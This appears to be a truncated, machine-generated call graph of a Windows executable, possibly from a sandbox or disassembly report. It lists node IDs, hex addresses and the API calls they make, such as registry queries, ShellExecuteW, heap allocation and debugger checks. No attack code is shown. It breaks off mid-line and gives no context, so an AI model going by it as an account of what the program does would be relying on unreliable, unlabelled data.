__getptd_noexit 84467->84476 84469->84450 84470->84447 84471->84451 84472->84462 84473->84462 84475->84467 84476->84460 84477->84460 84478->84432 84480 40c619 84479->84480 84481 40c60a 84479->84481 84480->84425 84481->84480 84484 4026f0 84481->84484 84483 426d7a _memmove 84483->84425 84485 426873 84484->84485 84486 4026ff 84484->84486 84487 4013a0 52 API calls 84485->84487 84486->84483 84488 42687b 84487->84488 84489 4115d7 52 API calls 84488->84489 84490 42689e _memmove 84489->84490 84490->84483 84491->84436 84492->84390 84493 40bd20 84494 428194 84493->84494 84502 40bd2d 84493->84502 84495 40bd43 84494->84495 84496 4281bc 84494->84496 84498 4281b2 84494->84498 84515 45e987 86 API calls moneypunct 84496->84515 84514 40b510 VariantClear 84498->84514 84503 40bd37 84502->84503 84516 4531b1 85 API calls 5 library calls 84502->84516 84505 40bd50 84503->84505 84504 4281ba 84506 426cf1 84505->84506 84507 40bd63 84505->84507 84526 44cde9 52 API calls _memmove 84506->84526 84517 40bd80 84507->84517 84510 40bd73 84510->84495 84511 426cfc 84512 40e0a0 52 API calls 84511->84512 84513 426d02 84512->84513 84514->84504 84515->84502 84516->84503 84518 40bd8e 84517->84518 84523 40bdb7 _memmove 84517->84523 84519 40bded 84518->84519 84520 40bdad 84518->84520 84518->84523 84521 4115d7 52 API calls 84519->84521 84527 402f00 84520->84527 84524 40bdf6 84521->84524 84523->84510 84524->84523 84525 4115d7 52 API calls 84524->84525 84525->84523 84526->84511 84528 402f10 84527->84528 84529 402f0c 84527->84529 84530 4115d7 52 API calls 84528->84530 84531 4268c3 84528->84531 84529->84523 84532 402f51 moneypunct _memmove 84530->84532 84532->84523 84533 425ba2 84538 40e360 84533->84538 84535 425bb4 84554 41130a 51 API calls __cinit 84535->84554 84537 425bbe 84539 4115d7 52 API calls 84538->84539 84540 40e3ec GetModuleFileNameW 84539->84540 84555 413a0e 84540->84555 84542 40e421 _wcsncat 84558 413a9e 84542->84558 84545 4115d7 52 API calls 84546 40e45e _wcscpy 84545->84546 84561 40bc70 84546->84561 84550 40e4a9 84550->84535 84551 401c90 52 API calls 84553 40e4a1 _wcscat _wcslen _wcsncpy 84551->84553 84552 4115d7 52 API calls 84552->84553 84553->84550 84553->84551 84553->84552 84554->84537 84580 413801 84555->84580 84610 419efd 84558->84610 84562 4115d7 52 API calls 84561->84562 84563 40bc98 84562->84563 84564 4115d7 52 API calls 84563->84564 84565 40bca6 84564->84565 84566 40e4c0 84565->84566 84622 403350 84566->84622 84568 40e4cb RegOpenKeyExW 84569 427190 RegQueryValueExW 84568->84569 84570 40e4eb 84568->84570 84571 4271b0 84569->84571 84572 42721a RegCloseKey 84569->84572 84570->84553 84573 4115d7 52 API calls 84571->84573 84572->84553 84574 4271cb 84573->84574 84629 43652f 52 API calls 84574->84629 84576 4271d8 RegQueryValueExW 84577 42720e 84576->84577 84578 4271f7 84576->84578 84577->84572 84579 402160 52 API calls 84578->84579 84579->84577 84582 41389e 84580->84582 84587 41381a 84580->84587 84581 4139e8 84607 417f77 46 API calls __getptd_noexit 84581->84607 84582->84581 84584 413a00 84582->84584 84609 417f77 46 API calls __getptd_noexit 84584->84609 84585 4139ed 84608 417f25 10 API calls __controlfp_s 84585->84608 84587->84582 84598 41388a 84587->84598 84602 419e30 46 API calls __controlfp_s 84587->84602 84589 413967 84589->84542 84590 413909 84592 41396c 84590->84592 84593 413929 84590->84593 84592->84582 84592->84589 84594 41397a 84592->84594 84593->84582 84599 413945 84593->84599 84604 419e30 46 API calls __controlfp_s 84593->84604 84606 419e30 46 API calls __controlfp_s 84594->84606 84597 41395b 84605 419e30 46 API calls __controlfp_s 84597->84605 84598->84582 84598->84590 84603 419e30 46 API calls __controlfp_s 84598->84603 84599->84582 84599->84589 84599->84597 84602->84598 84603->84590 84604->84599 84605->84589 84606->84589 84607->84585 84608->84589 84609->84589 84611 419f13 84610->84611 84612 419f0e 84610->84612 84619 417f77 46 API calls __getptd_noexit 84611->84619 84612->84611 84617 419f2b 84612->84617 84614 419f18 84620 417f25 10 API calls __controlfp_s 84614->84620 84616 40e454 84616->84545 84617->84616 84621 417f77 46 API calls __getptd_noexit 84617->84621 84619->84614 84620->84616 84621->84614 84623 403367 84622->84623 84624 403358 84622->84624 84625 4115d7 52 API calls 84623->84625 84624->84568 84626 403370 84625->84626 84627 4115d7 52 API calls 84626->84627 84628 40339e 84627->84628 84628->84568 84629->84576 84630 416454 84667 416c70 84630->84667 84632 416460 GetStartupInfoW 84633 416474 84632->84633 84668 419d5a HeapCreate 84633->84668 84635 4164cd 84636 4164d8 84635->84636 84752 41642b 46 API calls 3 library calls 84635->84752 84669 417c20 GetModuleHandleW 84636->84669 84639 4164de 84640 4164e9 __RTC_Initialize 84639->84640 84753 41642b 46 API calls 3 library calls 84639->84753 84688 41aaa1 GetStartupInfoW 84640->84688 84644 416503 GetCommandLineW 84701 41f584 GetEnvironmentStringsW 84644->84701 84648 416513 84707 41f4d6 GetModuleFileNameW 84648->84707 84650 41651d 84651 416528 84650->84651 84755 411924 46 API calls 3 library calls 84650->84755 84711 41f2a4 84651->84711 84654 41652e 84655 416539 84654->84655 84756 411924 46 API calls 3 library calls 84654->84756 84725 411703 84655->84725 84658 416541 84660 41654c __wwincmdln 84658->84660 84757 411924 46 API calls 3 library calls 84658->84757 84729 40d6b0 84660->84729 84663 41657c 84759 411906 46 API calls _doexit 84663->84759 84666 416581 _flsall 84667->84632 84668->84635 84670 417c34 84669->84670 84671 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84669->84671 84760 4178ff 49 API calls _free 84670->84760 84673 417c87 TlsAlloc 84671->84673 84676 417cd5 TlsSetValue 84673->84676 84677 417d96 84673->84677 84674 417c39 84674->84639 84676->84677 84678 417ce6 __init_pointers 84676->84678 84677->84639 84761 418151 InitializeCriticalSectionAndSpinCount 84678->84761 84680 417d91 84769 4178ff 49 API calls _free 84680->84769 84682 417d2a 84682->84680 84762 416b49 84682->84762 84685 417d76 84768 41793c 46 API calls 4 library calls 84685->84768 84687 417d7e GetCurrentThreadId 84687->84677 84689 416b49 __calloc_crt 46 API calls 84688->84689 84696 41aabf 84689->84696 84690 4164f7 84690->84644 84754 411924 46 API calls 3 library calls 84690->84754 84691 41ac34 84692 41ac6a GetStdHandle 84691->84692 84694 41acce SetHandleCount 84691->84694 84695 41ac7c GetFileType 84691->84695 84700 41aca2 InitializeCriticalSectionAndSpinCount 84691->84700 84692->84691 84693 416b49 __calloc_crt 46 API calls 84693->84696 84694->84690 84695->84691 84696->84690 84696->84691 84696->84693 84697 41abb4 84696->84697 84697->84691 84698 41abe0 GetFileType 84697->84698 84699 41abeb InitializeCriticalSectionAndSpinCount 84697->84699 84698->84697 84698->84699 84699->84690 84699->84697 84700->84690 84700->84691 84702 41f595 84701->84702 84703 41f599 84701->84703 84702->84648 84779 416b04 84703->84779 84705 41f5bb _memmove 84706 41f5c2 FreeEnvironmentStringsW 84705->84706 84706->84648 84708 41f50b _wparse_cmdline 84707->84708 84709 416b04 __malloc_crt 46 API calls 84708->84709 84710 41f54e _wparse_cmdline 84708->84710 84709->84710 84710->84650 84712 41f2bc _wcslen 84711->84712 84716 41f2b4 84711->84716 84713 416b49 __calloc_crt 46 API calls 84712->84713 84718 41f2e0 _wcslen 84713->84718 84714 41f336 84786 413748 84714->84786 84716->84654 84717 416b49 __calloc_crt 46 API calls 84717->84718 84718->84714 84718->84716 84718->84717 84719 41f35c 84718->84719 84722 41f373 84718->84722 84785 41ef12 46 API calls __controlfp_s 84718->84785 84720 413748 _free 46 API calls 84719->84720 84720->84716 84792 417ed3 84722->84792 84724 41f37f 84724->84654 84726 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84725->84726 84728 411750 __IsNonwritableInCurrentImage 84726->84728 84811 41130a 51 API calls __cinit 84726->84811 84728->84658 84730 42e2f3 84729->84730 84731 40d6cc 84729->84731 84812 408f40 84731->84812 84733 40d707 84816 40ebb0 84733->84816 84736 40d737 84819 411951 84736->84819 84741 40d751 84831 40f4e0 SystemParametersInfoW SystemParametersInfoW 84741->84831 84743 40d75f 84832 40d590 GetCurrentDirectoryW 84743->84832 84745 40d767 SystemParametersInfoW 84746 40d794 84745->84746 84747 40d78d FreeLibrary 84745->84747 84748 408f40 VariantClear 84746->84748 84747->84746 84749 40d79d 84748->84749 84750 408f40 VariantClear 84749->84750 84751 40d7a6 84750->84751 84751->84663 84758 4118da 46 API calls _doexit 84751->84758 84752->84636 84753->84640 84758->84663 84759->84666 84760->84674 84761->84682 84764 416b52 84762->84764 84765 416b8f 84764->84765 84766 416b70 Sleep 84764->84766 84770 41f677 84764->84770 84765->84680 84765->84685 84767 416b85 84766->84767 84767->84764 84767->84765 84768->84687 84769->84677 84771 41f683 84770->84771 84777 41f69e _malloc 84770->84777 84772 41f68f 84771->84772 84771->84777 84778 417f77 46 API calls __getptd_noexit 84772->84778 84773 41f6b1 HeapAlloc 84776 41f6d8 84773->84776 84773->84777 84775 41f694 84775->84764 84776->84764 84777->84773 84777->84776 84778->84775 84782 416b0d 84779->84782 84780 4135bb _malloc 45 API calls 84780->84782 84781 416b43 84781->84705 84782->84780 84782->84781 84783 416b24 Sleep 84782->84783 84784 416b39 84783->84784 84784->84781 84784->84782 84785->84718 84787 413753 RtlFreeHeap 84786->84787 84791 41377c __dosmaperr 84786->84791 84788 413768 84787->84788 84787->84791 84795 417f77 46 API calls __getptd_noexit 84788->84795 84790 41376e GetLastError 84790->84791 84791->84716 84796 417daa 84792->84796 84795->84790 84797 417dc9 __call_reportfault 84796->84797 84798 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84797->84798 84801 417eb5 __call_reportfault 84798->84801 84800 417ed1 GetCurrentProcess TerminateProcess 84800->84724 84802 41a208 84801->84802 84803 41a210 84802->84803 84804 41a212 IsDebuggerPresent 84802->84804 84803->84800 84810 41fe19 84804->84810 84807 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84808 421ff0 __call_reportfault 84807->84808 84809 421ff8 GetCurrentProcess TerminateProcess 84807->84809 84808->84809 84809->84800 84810->84807 84811->84728 84813 408f48 moneypunct 84812->84813 84814 4265c7 VariantClear 84813->84814 84815 408f55 moneypunct 84813->84815 84814->84815 84815->84733 84872 40ebd0 84816->84872 84876 4182cb 84819->84876 84821 41195e 84883 4181f2 LeaveCriticalSection 84821->84883 84823 40d748 84824 4119b0 84823->84824 84825 4119d6 84824->84825 84826 4119bc 84824->84826 84825->84741 84826->84825 84918 417f77 46 API calls __getptd_noexit 84826->84918 84828 4119c6 84919 417f25 10 API calls __controlfp_s 84828->84919 84830 4119d1 84830->84741 84831->84743 84920 401f20 84832->84920 84834 40d5b6 IsDebuggerPresent 84835 40d5c4 84834->84835 84836 42e1bb MessageBoxA 84834->84836 84837 42e1d4 84835->84837 84838 40d5e3 84835->84838 84836->84837 85092 403a50 52 API calls 3 library calls 84837->85092 84990 40f520 84838->84990 84842 40d5fd GetFullPathNameW 85002 401460 84842->85002 84844 40d63b 84845 40d643 84844->84845 84846 42e231 SetCurrentDirectoryW 84844->84846 84847 40d64c 84845->84847 85093 432fee 6 API calls 84845->85093 84846->84845 85017 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84847->85017 84850 42e252 84850->84847 84852 42e25a GetModuleFileNameW 84850->84852 84854 42e274 84852->84854 84855 42e2cb GetForegroundWindow ShellExecuteW 84852->84855 85094 401b10 84854->85094 84858 40d688 84855->84858 84856 40d669 85025 4091e0 84856->85025 84857 40d656 84857->84856 84860 40e0c0 74 API calls 84857->84860 84864 40d692 SetCurrentDirectoryW 84858->84864 84860->84856 84864->84745 84866 42e28d 85101 40d200 52 API calls 2 library calls 84866->85101 84869 42e299 GetForegroundWindow ShellExecuteW 84870 42e2c6 84869->84870 84870->84858 84871 40ec00 LoadLibraryA GetProcAddress 84871->84736 84873 40d72e 84872->84873 84874 40ebd6 LoadLibraryA 84872->84874 84873->84736 84873->84871 84874->84873 84875 40ebe7 GetProcAddress 84874->84875 84875->84873 84877 4182e0 84876->84877 84878 4182f3 EnterCriticalSection 84876->84878 84884 418209 84877->84884 84878->84821 84880 4182e6 84880->84878 84911 411924 46 API calls 3 library calls 84880->84911 84883->84823 84885 418215 _flsall 84884->84885 84886 418225 84885->84886 84887 41823d 84885->84887 84912 418901 46 API calls 2 library calls 84886->84912 84889 416b04 __malloc_crt 45 API calls 84887->84889 84895 41824b _flsall 84887->84895 84891 418256 84889->84891 84890 41822a 84913 418752 46 API calls 7 library calls 84890->84913 84893 41825d 84891->84893 84894 41826c 84891->84894 84915 417f77 46 API calls __getptd_noexit 84893->84915 84898 4182cb __lock 45 API calls 84894->84898 84895->84880 84896 418231 84914 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84896->84914 84900 418273 84898->84900 84902 4182a6 84900->84902 84903 41827b InitializeCriticalSectionAndSpinCount 84900->84903 84904 413748 _free 45 API calls 84902->84904 84905 41828b 84903->84905 84907 418297 84903->84907 84904->84907 84906 413748 _free 45 API calls 84905->84906 84909 418291 84906->84909 84917 4182c2 LeaveCriticalSection _doexit 84907->84917 84916 417f77 46 API calls __getptd_noexit 84909->84916 84912->84890 84913->84896 84915->84895 84916->84907 84917->84895 84918->84828 84919->84830 85102 40e6e0 84920->85102 84924 401f41 GetModuleFileNameW 85120 410100 84924->85120 84926 401f5c 85132 410960 84926->85132 84929 401b10 52 API calls 84930 401f81 84929->84930 85135 401980 84930->85135 84932 401f8e 84933 408f40 VariantClear 84932->84933 84934 401f9d 84933->84934 84935 401b10 52 API calls 84934->84935 84936 401fb4 84935->84936 84937 401980 53 API calls 84936->84937 84938 401fc3 84937->84938 84939 401b10 52 API calls 84938->84939 84940 401fd2 84939->84940 85143 40c2c0 84940->85143 84942 401fe1 84943 40bc70 52 API calls 84942->84943 84944 401ff3 84943->84944 85161 401a10 84944->85161 84946 401ffe 85168 4114ab 84946->85168 84949 428b05 84951 401a10 52 API calls 84949->84951 84950 402017 84952 4114ab __wcsicoll 58 API calls 84950->84952 84953 428b18 84951->84953 84954 402022 84952->84954 84956 401a10 52 API calls 84953->84956 84954->84953 84955 40202d 84954->84955 84957 4114ab __wcsicoll 58 API calls 84955->84957 84958 428b33 84956->84958 84959 402038 84957->84959 84961 428b3b GetModuleFileNameW 84958->84961 84960 402043 84959->84960 84959->84961 84962 4114ab __wcsicoll 58 API calls 84960->84962 84963 401a10 52 API calls 84961->84963 84966 40204e 84962->84966 84964 428b6c 84963->84964 84965 40e0a0 52 API calls 84964->84965 84967 428b7a 84965->84967 84968 428b90 _wcscpy 84966->84968 84971 401a10 52 API calls 84966->84971 84981 402092 84966->84981 84972 401a10 52 API calls 84967->84972 84976 401a10 52 API calls 84968->84976 84969 428bc6 84970 4020a3 84970->84969 85176 40e830 53 API calls 84970->85176 84974 402073 _wcscpy 84971->84974 84975 428b88 84972->84975 84979 401a10 52 API calls 84974->84979 84975->84968 84985 4020d0 84976->84985 84977 4020bb 85177 40cf00 53 API calls 84977->85177 84979->84981 84980 4020c6 84982 408f40 VariantClear 84980->84982 84981->84968 84981->84970 84982->84985 84983 402110 84987 408f40 VariantClear 84983->84987 84985->84983 84988 401a10 52 API calls 84985->84988 85178 40cf00 53 API calls 84985->85178 85179 40e6a0 53 API calls 84985->85179 84989 402120 moneypunct 84987->84989 84988->84985 84989->84834 84991 40f53c 84990->84991 84992 4295c9 __call_reportfault 84990->84992 85855 410120 84991->85855 84994 4295d9 GetOpenFileNameW 84992->84994 84994->84991 84996 40d5f5 84994->84996 84995 40f545 85859 4102b0 SHGetMalloc 84995->85859 84996->84842 84996->84844 84998 40f54c 85864 410190 GetFullPathNameW 84998->85864 85000 40f559 85875 40f570 85000->85875 85937 402400 85002->85937 85004 40146f 85007 428c29 _wcscat 85004->85007 85946 401500 85004->85946 85006 40147c 85006->85007 85954 40d440 85006->85954 85009 401489 85009->85007 85010 401491 GetFullPathNameW 85009->85010 85011 402160 52 API calls 85010->85011 85012 4014bb 85011->85012 85013 402160 52 API calls 85012->85013 85014 4014c8 85013->85014 85014->85007 85015 402160 52 API calls 85014->85015 85016 4014ee 85015->85016 85016->84844 85018 428361 85017->85018 85019 4103fc LoadImageW RegisterClassExW 85017->85019 85974 44395e EnumResourceNamesW LoadImageW 85018->85974 85973 410490 7 API calls 85019->85973 85022 40d651 85024 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85022->85024 85023 428368 85024->84857 85026 409202 85025->85026 85027 42d7ad 85025->85027 85083 409216 moneypunct 85026->85083 86246 410940 331 API calls 85026->86246 86249 45e737 90 API calls 3 library calls 85027->86249 85030 409386 85031 40939c 85030->85031 86247 40f190 10 API calls 85030->86247 85031->84858 85091 401000 Shell_NotifyIconW __call_reportfault 85031->85091 85033 4095b2 85033->85031 85034 4095bf 85033->85034 86248 401a50 331 API calls 85034->86248 85035 409253 PeekMessageW 85035->85083 85037 42d8cd Sleep 85037->85083 85038 4095c6 LockWindowUpdate DestroyWindow GetMessageW 85038->85031 85041 4095f9 85038->85041 85040 42e13b 86267 40d410 VariantClear 85040->86267 85043 42e158 TranslateMessage DispatchMessageW GetMessageW 85041->85043 85043->85043 85046 42e188 85043->85046 85045 409567 PeekMessageW 85045->85083 85046->85031 85049 44c29d 52 API calls 85080 4094e0 85049->85080 85050 46f3c1 107 API calls 85050->85083 85051 40e0a0 52 API calls 85051->85083 85052 46fdbf 108 API calls 85052->85080 85053 409551 TranslateMessage DispatchMessageW 85053->85045 85055 42dcd2 WaitForSingleObject 85057 42dcf0 GetExitCodeProcess CloseHandle 85055->85057 85055->85083 85056 42dd3d Sleep 85056->85080 86256 40d410 VariantClear 85057->86256 85061 4094cf Sleep 85061->85080 85062 40c620 timeGetTime 85062->85080 85064 40d410 VariantClear 85064->85083 85066 42d94d timeGetTime 86252 465124 53 API calls 85066->86252 85069 47d33e 309 API calls 85069->85083 85070 42dd89 CloseHandle 85070->85080 85072 465124 53 API calls 85072->85080 85073 42de19 GetExitCodeProcess CloseHandle 85073->85080 85076 42de88 Sleep 85076->85083 85079 45e737 90 API calls 85079->85083 85080->85049 85080->85052 85080->85062 85080->85070 85080->85072 85080->85073 85080->85076 85080->85083 85087 401980 53 API calls 85080->85087 85088 401b10 52 API calls 85080->85088 85090 408f40 VariantClear 85080->85090 86253 45178a 54 API calls 85080->86253 86254 47d33e 331 API calls 85080->86254 86255 453bc6 54 API calls 85080->86255 86257 40d410 VariantClear 85080->86257 86258 443d19 67 API calls _wcslen 85080->86258 86259 4574b4 VariantClear 85080->86259 86260 403cd0 85080->86260 86264 4731e1 VariantClear 85080->86264 86265 4331a2 6 API calls 85080->86265 85083->85030 85083->85035 85083->85037 85083->85040 85083->85045 85083->85050 85083->85051 85083->85053 85083->85055 85083->85056 85083->85061 85083->85064 85083->85066 85083->85069 85083->85079 85083->85080 85084 42e0cc VariantClear 85083->85084 85085 408f40 VariantClear 85083->85085 85975 4091b0 85083->85975 86033 40afa0 85083->86033 86059 408fc0 85083->86059 86094 408cc0 85083->86094 86108 40d150 85083->86108 86113 40d170 85083->86113 86119 4096a0 85083->86119 86250 465124 53 API calls 85083->86250 86251 40c620 timeGetTime 85083->86251 86266 40e270 VariantClear moneypunct 85083->86266 85084->85083 85085->85083 85087->85080 85088->85080 85090->85080 85091->84858 85092->84844 85093->84850 85095 401b16 _wcslen 85094->85095 85096 4115d7 52 API calls 85095->85096 85097 401b63 85095->85097 85098 401b4b _memmove 85096->85098 85100 40d200 52 API calls 2 library calls 85097->85100 85099 4115d7 52 API calls 85098->85099 85099->85097 85100->84866 85101->84869 85103 40bc70 52 API calls 85102->85103 85104 401f31 85103->85104 85105 402560 85104->85105 85106 40256d __write_nolock 85105->85106 85107 402160 52 API calls 85106->85107 85109 402593 85107->85109 85111 4025bd 85109->85111 85180 401c90 85109->85180 85110 4026f0 52 API calls 85110->85111 85111->85110 85113 4026a7 85111->85113 85115 401b10 52 API calls 85111->85115 85117 401c90 52 API calls 85111->85117 85183 40d7c0 52 API calls 2 library calls 85111->85183 85112 4026db 85112->84924 85113->85112 85114 401b10 52 API calls 85113->85114 85116 4026d1 85114->85116 85115->85111 85184 40d7c0 52 API calls 2 library calls 85116->85184 85117->85111 85185 40f760 85120->85185 85123 410118 85123->84926 85125 42805d 85128 42806a 85125->85128 85241 431e58 85125->85241 85127 413748 _free 46 API calls 85129 428078 85127->85129 85128->85127 85130 431e58 82 API calls 85129->85130 85131 428084 85130->85131 85131->84926 85133 4115d7 52 API calls 85132->85133 85134 401f74 85133->85134 85134->84929 85136 4019a3 85135->85136 85140 401985 85135->85140 85137 4019b8 85136->85137 85136->85140 85844 403e10 53 API calls 85137->85844 85139 40199f 85139->84932 85140->85139 85843 403e10 53 API calls 85140->85843 85141 4019c4 85141->84932 85144 40c2c7 85143->85144 85145 40c30e 85143->85145 85146 40c2d3 85144->85146 85147 426c79 85144->85147 85148 40c315 85145->85148 85149 426c2b 85145->85149 85845 403ea0 52 API calls __cinit 85146->85845 85850 4534e3 52 API calls 85147->85850 85153 40c321 85148->85153 85156 426c5a 85148->85156 85151 426c4b 85149->85151 85152 426c2e 85149->85152 85848 4534e3 52 API calls 85151->85848 85160 40c2de 85152->85160 85847 4534e3 52 API calls 85152->85847 85846 403ea0 52 API calls __cinit 85153->85846 85849 4534e3 52 API calls 85156->85849 85160->84942 85162 401a30 85161->85162 85163 401a17 85161->85163 85165 402160 52 API calls 85162->85165 85164 401a2d 85163->85164 85851 403c30 52 API calls _memmove 85163->85851 85164->84946 85167 401a3d 85165->85167 85167->84946 85169 411523 85168->85169 85170 4114ba 85168->85170 85854 4113a8 58 API calls 3 library calls 85169->85854 85173 40200c 85170->85173 85852 417f77 46 API calls __getptd_noexit 85170->85852 85173->84949 85173->84950 85174 4114c6 85853 417f25 10 API calls __controlfp_s 85174->85853 85176->84977 85177->84980 85178->84985 85179->84985 85181 4026f0 52 API calls 85180->85181 85182 401c97 85181->85182 85182->85109 85183->85111 85184->85112 85245 40f6f0 85185->85245 85187 40f77b _strcat moneypunct 85253 40f850 85187->85253 85192 427c2a 85282 414d04 85192->85282 85194 40f7fc 85194->85192 85195 40f804 85194->85195 85269 414a46 85195->85269 85200 40f80e 85200->85123 85204 4528bd 85200->85204 85201 427c59 85288 414fe2 85201->85288 85203 427c79 85205 4150d1 _fseek 81 API calls 85204->85205 85206 452930 85205->85206 85785 452719 85206->85785 85209 452948 85209->85125 85210 414d04 __fread_nolock 61 API calls 85211 452966 85210->85211 85212 414d04 __fread_nolock 61 API calls 85211->85212 85213 452976 85212->85213 85214 414d04 __fread_nolock 61 API calls 85213->85214 85215 45298f 85214->85215 85216 414d04 __fread_nolock 61 API calls 85215->85216 85217 4529aa 85216->85217 85218 4150d1 _fseek 81 API calls 85217->85218 85219 4529c4 85218->85219 85220 4135bb _malloc 46 API calls 85219->85220 85221 4529cf 85220->85221 85222 4135bb _malloc 46 API calls 85221->85222 85223 4529db 85222->85223 85224 414d04 __fread_nolock 61 API calls 85223->85224 85225 4529ec 85224->85225 85226 44afef GetSystemTimeAsFileTime 85225->85226 85227 452a00 85226->85227 85228 452a36 85227->85228 85229 452a13 85227->85229 85231 452aa5 85228->85231 85232 452a3c 85228->85232 85230 413748 _free 46 API calls 85229->85230 85233 452a1c 85230->85233 85235 413748 _free 46 API calls 85231->85235 85791 44b1a9 85232->85791 85236 413748 _free 46 API calls 85233->85236 85240 452aa3 85235->85240 85238 452a25 85236->85238 85237 452a9d 85239 413748 _free 46 API calls 85237->85239 85238->85125 85239->85240 85240->85125 85242 431e64 85241->85242 85243 431e6a 85241->85243 85244 414a46 __fcloseall 82 API calls 85242->85244 85243->85128 85244->85243 85246 425de2 85245->85246 85249 40f6fc _wcslen 85245->85249 85246->85187 85247 40f710 WideCharToMultiByte 85248 40f756 85247->85248 85250 40f728 85247->85250 85248->85187 85249->85247 85251 4115d7 52 API calls 85250->85251 85252 40f735 WideCharToMultiByte 85251->85252 85252->85187 85254 40f85d __call_reportfault _strlen 85253->85254 85256 40f7ab 85254->85256 85301 414db8 85254->85301 85257 4149c2 85256->85257 85313 414904 85257->85313 85259 40f7e9 85259->85192 85260 40f5c0 85259->85260 85265 40f5cd _strcat __write_nolock _memmove 85260->85265 85261 414d04 __fread_nolock 61 API calls 85261->85265 85263 425d11 85264 4150d1 _fseek 81 API calls 85263->85264 85266 425d33 85264->85266 85265->85261 85265->85263 85268 40f691 __tzset_nolock 85265->85268 85401 4150d1 85265->85401 85267 414d04 __fread_nolock 61 API calls 85266->85267 85267->85268 85268->85194 85270 414a52 _flsall 85269->85270 85271 414a64 85270->85271 85272 414a79 85270->85272 85541 417f77 46 API calls __getptd_noexit 85271->85541 85275 415471 __lock_file 47 API calls 85272->85275 85279 414a74 _flsall 85272->85279 85274 414a69 85542 417f25 10 API calls __controlfp_s 85274->85542 85277 414a92 85275->85277 85525 4149d9 85277->85525 85279->85200 85610 414c76 85282->85610 85284 414d1c 85285 44afef 85284->85285 85778 442c5a 85285->85778 85287 44b00d 85287->85201 85289 414fee _flsall 85288->85289 85290 414ffa 85289->85290 85291 41500f 85289->85291 85782 417f77 46 API calls __getptd_noexit 85290->85782 85292 415471 __lock_file 47 API calls 85291->85292 85294 415017 85292->85294 85296 414e4e __ftell_nolock 51 API calls 85294->85296 85295 414fff 85783 417f25 10 API calls __controlfp_s 85295->85783 85298 415024 85296->85298 85784 41503d LeaveCriticalSection LeaveCriticalSection _fseek 85298->85784 85299 41500a _flsall 85299->85203 85302 414dd6 85301->85302 85303 414deb 85301->85303 85310 417f77 46 API calls __getptd_noexit 85302->85310 85303->85302 85304 414df2 85303->85304 85308 414de6 85304->85308 85312 418f98 77 API calls 7 library calls 85304->85312 85306 414ddb 85311 417f25 10 API calls __controlfp_s 85306->85311 85308->85254 85310->85306 85311->85308 85312->85308 85315 414910 _flsall 85313->85315 85314 414923 85369 417f77 46 API calls __getptd_noexit 85314->85369 85315->85314 85318 414951 85315->85318 85317 414928 85370 417f25 10 API calls __controlfp_s 85317->85370 85332 41d4d1 85318->85332 85321 414956 85322 41496a 85321->85322 85323 41495d 85321->85323 85324 414992 85322->85324 85325 414972 85322->85325 85371 417f77 46 API calls __getptd_noexit 85323->85371 85349 41d218 85324->85349 85372 417f77 46 API calls __getptd_noexit 85325->85372 85329 414933 _flsall @_EH4_CallFilterFunc@8 85329->85259 85333 41d4dd _flsall 85332->85333 85334 4182cb __lock 46 API calls 85333->85334 85342 41d4eb 85334->85342 85335 41d560 85374 41d5fb 85335->85374 85336 41d567 85338 416b04 __malloc_crt 46 API calls 85336->85338 85340 41d56e 85338->85340 85339 41d5f0 _flsall 85339->85321 85340->85335 85341 41d57c InitializeCriticalSectionAndSpinCount 85340->85341 85343 41d59c 85341->85343 85344 41d5af EnterCriticalSection 85341->85344 85342->85335 85342->85336 85345 418209 __mtinitlocknum 46 API calls 85342->85345 85377 4154b2 47 API calls __lock 85342->85377 85378 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85342->85378 85347 413748 _free 46 API calls 85343->85347 85344->85335 85345->85342 85347->85335 85350 41d23a 85349->85350 85351 41d255 85350->85351 85363 41d26c __wopenfile 85350->85363 85383 417f77 46 API calls __getptd_noexit 85351->85383 85352 41d421 85356 41d47a 85352->85356 85357 41d48c 85352->85357 85354 41d25a 85384 417f25 10 API calls __controlfp_s 85354->85384 85388 417f77 46 API calls __getptd_noexit 85356->85388 85380 422bf9 85357->85380 85360 41d47f 85389 417f25 10 API calls __controlfp_s 85360->85389 85361 41499d 85373 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 85361->85373 85363->85352 85363->85356 85385 41341f 58 API calls 2 library calls 85363->85385 85365 41d41a 85365->85352 85386 41341f 58 API calls 2 library calls 85365->85386 85367 41d439 85367->85352 85387 41341f 58 API calls 2 library calls 85367->85387 85369->85317 85370->85329 85371->85329 85372->85329 85373->85329 85379 4181f2 LeaveCriticalSection 85374->85379 85376 41d602 85376->85339 85377->85342 85378->85342 85379->85376 85390 422b35 85380->85390 85382 422c14 85382->85361 85383->85354 85384->85361 85385->85365 85386->85367 85387->85352 85388->85360 85389->85361 85393 422b41 _flsall 85390->85393 85391 422b54 85392 417f77 __controlfp_s 46 API calls 85391->85392 85395 422b59 85392->85395 85393->85391 85394 422b8a 85393->85394 85397 422400 __tsopen_nolock 109 API calls 85394->85397 85396 417f25 __controlfp_s 10 API calls 85395->85396 85400 422b63 _flsall 85396->85400 85398 422ba4 85397->85398 85399 422bcb __wsopen_helper LeaveCriticalSection 85398->85399 85399->85400 85400->85382 85402 4150dd _flsall 85401->85402 85403 4150e9 85402->85403 85404 41510f 85402->85404 85432 417f77 46 API calls __getptd_noexit 85403->85432 85414 415471 85404->85414 85407 4150ee 85433 417f25 10 API calls __controlfp_s 85407->85433 85413 4150f9 _flsall 85413->85265 85415 415483 85414->85415 85416 4154a5 EnterCriticalSection 85414->85416 85415->85416 85417 41548b 85415->85417 85418 415117 85416->85418 85419 4182cb __lock 46 API calls 85417->85419 85420 415047 85418->85420 85419->85418 85421 415067 85420->85421 85422 415057 85420->85422 85427 415079 85421->85427 85435 414e4e 85421->85435 85490 417f77 46 API calls __getptd_noexit 85422->85490 85426 41505c 85434 415143 LeaveCriticalSection LeaveCriticalSection _fseek 85426->85434 85452 41443c 85427->85452 85430 4150b9 85465 41e1f4 85430->85465 85432->85407 85433->85413 85434->85413 85436 414e61 85435->85436 85437 414e79 85435->85437 85491 417f77 46 API calls __getptd_noexit 85436->85491 85439 414139 __ftell_nolock 46 API calls 85437->85439 85441 414e80 85439->85441 85440 414e66 85492 417f25 10 API calls 